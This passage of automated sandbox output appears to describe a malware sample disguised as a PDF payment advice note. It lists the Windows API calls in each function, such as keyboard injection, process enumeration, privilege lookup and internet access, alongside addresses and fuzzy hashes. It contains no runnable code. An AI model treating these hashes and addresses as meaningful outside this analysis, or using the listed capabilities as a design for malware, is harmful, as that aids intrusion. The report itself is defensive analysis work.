                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID:
                                                              • API String ID: 4218353326-0
                                                              • Opcode ID: 6e9ffc944748fb717e3f13032a68df440ca28c9569deed872e757818f8ed0b63
                                                              • Instruction ID: 240ac6227a167fda89d09630d1f845ad8b0a61bfd803c3b6193658df6bfdb3da
                                                              • Opcode Fuzzy Hash: 6e9ffc944748fb717e3f13032a68df440ca28c9569deed872e757818f8ed0b63
                                                              • Instruction Fuzzy Hash: EC418231500118ABCB24EBA8DC85FEEB7A9FF44310F148155F919D7392EB34AD24CB52
                                                              APIs
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 008AB89E
                                                              • GetLastError.KERNEL32(?,00000000), ref: 008AB8C4
                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008AB8E9
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008AB915
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                              • String ID:
                                                              • API String ID: 3321077145-0
                                                              • Opcode ID: 84da09d52ea07656e26393a2e82e441b063aa99b361b2e8d2ae0c145095a0183
                                                              • Instruction ID: 23b64d88758e497bcc7c97cf52a188bc4cb75b02fc942228b6b1b50da85e9460
                                                              • Opcode Fuzzy Hash: 84da09d52ea07656e26393a2e82e441b063aa99b361b2e8d2ae0c145095a0183
                                                              • Instruction Fuzzy Hash: A5410C35600514DFDB21DF19C445A5ABBE1FF8A310F198099ED8A9B762CB35FD01CB92
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008C88DE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: cd3c15d1f509b1dcb48fb68f1bc8ab2296000cf29833a1151397290df4de31fc
                                                              • Instruction ID: 89ad2e5622923f24c4d28145e32fb9c0b10f913fc8bbbc9b56efdbaec29eaa26
                                                              • Opcode Fuzzy Hash: cd3c15d1f509b1dcb48fb68f1bc8ab2296000cf29833a1151397290df4de31fc
                                                              • Instruction Fuzzy Hash: 6531B034684108EFEB209A68DC45FB97BB5FB09310F94412AFA11E76A1CF70E9849B52
                                                              APIs
                                                              • ClientToScreen.USER32(?,?), ref: 008CAB60
                                                              • GetWindowRect.USER32(?,?), ref: 008CABD6
                                                              • PtInRect.USER32(?,?,008CC014), ref: 008CABE6
                                                              • MessageBeep.USER32(00000000), ref: 008CAC57
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                              • String ID:
                                                              • API String ID: 1352109105-0
                                                              • Opcode ID: 7c87e7f147607bcd8916007352fe4dda094b4f5f8bfb13fded337b8ad957b9a1
                                                              • Instruction ID: e6f05fb8b7e1f23638039fce4d2bbb36a459d2a63f5c18005ea145c2938df079
                                                              • Opcode Fuzzy Hash: 7c87e7f147607bcd8916007352fe4dda094b4f5f8bfb13fded337b8ad957b9a1
                                                              • Instruction Fuzzy Hash: DC417930A0021D9FCB19DF58D884FA9BBF6FB49318F1881A9E914DB261D730E841DF92
                                                              APIs
                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 008A0B27
                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 008A0B43
                                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 008A0BA9
                                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 008A0BFB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: fcb281c5fa4ae6f27397914b9951b8fae60f3ce467b67b69726384c5b4fe8d01
                                                              • Instruction ID: 86b822acbfd25b0b939036715cd86eff6e8a68b9bf5234627e71f9bfd2693ddf
                                                              • Opcode Fuzzy Hash: fcb281c5fa4ae6f27397914b9951b8fae60f3ce467b67b69726384c5b4fe8d01
                                                              • Instruction Fuzzy Hash: 6F313930A406186EFF348B698D05BF9BBA5FB47338F08425AE580D25D2C37589429B72
                                                              APIs
                                                              • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 008A0C66
                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 008A0C82
                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 008A0CE1
                                                              • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 008A0D33
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: e59f61ea6dba5f408532004f69f30a1ca70ddcd336624360f507a5eba06bf428
                                                              • Instruction ID: fb7f16829c873e0c40c7b0de12be785ffd88215018b7fc5ff796034245367db3
                                                              • Opcode Fuzzy Hash: e59f61ea6dba5f408532004f69f30a1ca70ddcd336624360f507a5eba06bf428
                                                              • Instruction Fuzzy Hash: 9A312630A4021C6FFF348B698805BFEBBB6FB47320F18431AE585D29D1D33999559B52
                                                              APIs
                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008761FB
                                                              • __isleadbyte_l.LIBCMT ref: 00876229
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00876257
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0087628D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              Similarity
                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
                                                              APIs
                                                              • GetForegroundWindow.USER32 ref: 008C4F02
                                                                • Part of subcall function 008A3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008A365B
                                                                • Part of subcall function 008A3641: GetCurrentThreadId.KERNEL32 ref: 008A3662
                                                                • Part of subcall function 008A3641: AttachThreadInput.USER32(00000000,?,008A5005), ref: 008A3669
                                                              • GetCaretPos.USER32(?), ref: 008C4F13
                                                              • ClientToScreen.USER32(00000000,?), ref: 008C4F4E
                                                              • GetForegroundWindow.USER32 ref: 008C4F54
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              Similarity
                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                              • String ID:
                                                              • API String ID: 2759813231-0
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 008A3C7A
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 008A3C88
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 008A3CA8
                                                              • CloseHandle.KERNEL32(00000000), ref: 008A3D52
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 420147892-0
                                                              APIs
                                                                • Part of subcall function 00842612: GetWindowLongW.USER32(?,000000EB), ref: 00842623
                                                              • GetCursorPos.USER32(?), ref: 008CC4D2
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0087B9AB,?,?,?,?,?), ref: 008CC4E7
                                                              • GetCursorPos.USER32(?), ref: 008CC534
                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0087B9AB,?,?,?), ref: 008CC56E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              Similarity
                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                              • String ID:
                                                              • API String ID: 2864067406-0
                                                              APIs
                                                                • Part of subcall function 0089810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00898121
                                                                • Part of subcall function 0089810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0089812B
                                                                • Part of subcall function 0089810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0089813A
                                                                • Part of subcall function 0089810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00898141
                                                                • Part of subcall function 0089810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00898157
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008986A3
                                                              • _memcmp.LIBCMT ref: 008986C6
                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008986FC
                                                              • HeapFree.KERNEL32(00000000), ref: 00898703
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              Similarity
                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                              • String ID:
                                                              • API String ID: 1592001646-0
                                                              APIs
                                                              • __setmode.LIBCMT ref: 008609AE
                                                                • Part of subcall function 00845A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008A7896,?,?,00000000), ref: 00845A2C
                                                                • Part of subcall function 00845A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008A7896,?,?,00000000,?,?), ref: 00845A50
                                                              • _fprintf.LIBCMT ref: 008609E5
                                                              • OutputDebugStringW.KERNEL32(?), ref: 00895DBB
                                                                • Part of subcall function 00864AAA: _flsall.LIBCMT ref: 00864AC3
                                                              • __setmode.LIBCMT ref: 00860A1A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                              • String ID:
                                                              • API String ID: 521402451-0
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008B17A3
                                                                • Part of subcall function 008B182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008B184C
                                                                • Part of subcall function 008B182D: InternetCloseHandle.WININET(00000000), ref: 008B18E9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              Similarity
                                                              • API ID: Internet$CloseConnectHandleOpen
                                                              • String ID:
                                                              • API String ID: 1463438336-0
                                                              APIs
                                                              • GetFileAttributesW.KERNEL32(?,008CFAC0), ref: 008A3A64
                                                              • GetLastError.KERNEL32 ref: 008A3A73
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 008A3A82
                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,008CFAC0), ref: 008A3ADF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              Similarity
                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                              • String ID:
                                                              • API String ID: 2267087916-0
                                                              APIs
                                                                • Part of subcall function 0089F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0089DCD3,?,?,?,0089EAC6,00000000,000000EF,00000119,?,?), ref: 0089F0CB
                                                                • Part of subcall function 0089F0BC: lstrcpyW.KERNEL32(00000000,?,?,0089DCD3,?,?,?,0089EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0089F0F1
                                                                • Part of subcall function 0089F0BC: lstrcmpiW.KERNEL32(00000000,?,0089DCD3,?,?,?,0089EAC6,00000000,000000EF,00000119,?,?), ref: 0089F122
                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0089EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0089DCEC
                                                              • lstrcpyW.KERNEL32(00000000,?,?,0089EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0089DD12
                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,0089EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0089DD46
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              Similarity
                                                              • API ID: lstrcmpilstrcpylstrlen
                                                              • String ID: cdecl
                                                              • API String ID: 4031866154-3896280584
                                                              APIs
                                                              • _free.LIBCMT ref: 00875101
                                                                • Part of subcall function 0086571C: __FF_MSGBANNER.LIBCMT ref: 00865733
                                                                • Part of subcall function 0086571C: __NMSG_WRITE.LIBCMT ref: 0086573A
                                                                • Part of subcall function 0086571C: RtlAllocateHeap.NTDLL(01610000,00000000,00000001,00000000,?,?,?,00860DD3,?), ref: 0086575F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              APIs
                                                                • Part of subcall function 00845A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008A7896,?,?,00000000), ref: 00845A2C
                                                                • Part of subcall function 00845A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008A7896,?,?,00000000,?,?), ref: 00845A50
                                                              • gethostbyname.WSOCK32(?,?,?), ref: 008B6399
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008B63A4
                                                              • _memmove.LIBCMT ref: 008B63D1
                                                              • inet_ntoa.WSOCK32(?), ref: 008B63DC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                              • String ID:
                                                              • API String ID: 1504782959-0
                                                              • Opcode ID: 4be58f71c06d7bcad9d6600541920147168554b4ec45f5c94ff84581f56110b2
                                                              • Instruction ID: 41a0481c164c863c19e2ab47069a5951fb15f0c2e8cd9795174ac2bcbad61468
                                                              • Opcode Fuzzy Hash: 4be58f71c06d7bcad9d6600541920147168554b4ec45f5c94ff84581f56110b2
                                                              • Instruction Fuzzy Hash: 66111C31500109AFCB04FBA8D946DEEBBB9FF58310B544065F506E7262EB31AE14DB62
                                                              APIs
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00898B61
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00898B73
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00898B89
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00898BA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 19b0b8511041b93d6bedfaf2445caf1859f6494bdde466c1fb02e8afd43575ff
                                                              • Instruction ID: 7684cca2b821a642dc434ec850c0786d4f926e02f2683e7ab7047f534545b9da
                                                              • Opcode Fuzzy Hash: 19b0b8511041b93d6bedfaf2445caf1859f6494bdde466c1fb02e8afd43575ff
                                                              • Instruction Fuzzy Hash: F1113A79900219FFEF10DB95CC84E9DBBB4FB48310F244095EA00B7250DA716E10DB94
                                                              APIs
                                                                • Part of subcall function 00842612: GetWindowLongW.USER32(?,000000EB), ref: 00842623
                                                              • DefDlgProcW.USER32(?,00000020,?), ref: 008412D8
                                                              • GetClientRect.USER32(?,?), ref: 0087B5FB
                                                              • GetCursorPos.USER32(?), ref: 0087B605
                                                              • ScreenToClient.USER32(?,?), ref: 0087B610
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                              • String ID:
                                                              • API String ID: 4127811313-0
                                                              • Opcode ID: 8106866697d7e0b5b90a68ac06bde535c636fb922b7e006b265f045dfd880e77
                                                              • Instruction ID: 1455eee153a95c400dc41e7517f3b4dcece514dc1b4b94d981d18ccfd8944767
                                                              • Opcode Fuzzy Hash: 8106866697d7e0b5b90a68ac06bde535c636fb922b7e006b265f045dfd880e77
                                                              • Instruction Fuzzy Hash: 10112235A0012DEFDF10EFA8D889DEE77B9FB05300F404466FA01E7241D770AA919BA6
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0089FCED,?,008A0D40,?,00008000), ref: 008A115F
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0089FCED,?,008A0D40,?,00008000), ref: 008A1184
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0089FCED,?,008A0D40,?,00008000), ref: 008A118E
                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,0089FCED,?,008A0D40,?,00008000), ref: 008A11C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CounterPerformanceQuerySleep
                                                              • String ID:
                                                              • API String ID: 2875609808-0
                                                              • Opcode ID: d8f622e89ef275b7b757074e70fb2e5c7c5b90406dc54e3a5a813c5ef49e5003
                                                              • Instruction ID: e7391c0a5797f6980944ca50ee9b1d001404e6911528778aeb1432368f2305a4
                                                              • Opcode Fuzzy Hash: d8f622e89ef275b7b757074e70fb2e5c7c5b90406dc54e3a5a813c5ef49e5003
                                                              • Instruction Fuzzy Hash: 37113C35D0051DDBEF009FA5D848AEEBBB9FF0A711F055056EB81F2241CB709560CB95
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0089D84D
                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0089D864
                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0089D879
                                                              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0089D897
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Type$Register$FileLoadModuleNameUser
                                                              • String ID:
                                                              • API String ID: 1352324309-0
                                                              • Opcode ID: 16b656f7833295f69b2241863046bd7699a42115365080639012ecacf8d2684b
                                                              • Instruction ID: 2f5d3acc668a47aa9831a77c0701049002ffbb748ccee3d58930736be65453c0
                                                              • Opcode Fuzzy Hash: 16b656f7833295f69b2241863046bd7699a42115365080639012ecacf8d2684b
                                                              • Instruction Fuzzy Hash: 4111A571601305DBF7209F90DC09F93BBBCFF00700F148979AA15E6042D7B0E5099BA5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                              • String ID:
                                                              • API String ID: 3016257755-0
                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                              • Instruction ID: 3b4743aa0c2a11dfade16a0c34d67e1df784f4a9038f820bf15906229a074527
                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                              • Instruction Fuzzy Hash: 2A014E7244454EBBCF165F88CC41CED3F62FB18354B588415FA1C99035D236D9B1EB81
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 008CB2E4
                                                              • ScreenToClient.USER32(?,?), ref: 008CB2FC
                                                              • ScreenToClient.USER32(?,?), ref: 008CB320
                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 008CB33B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                              • String ID:
                                                              • API String ID: 357397906-0
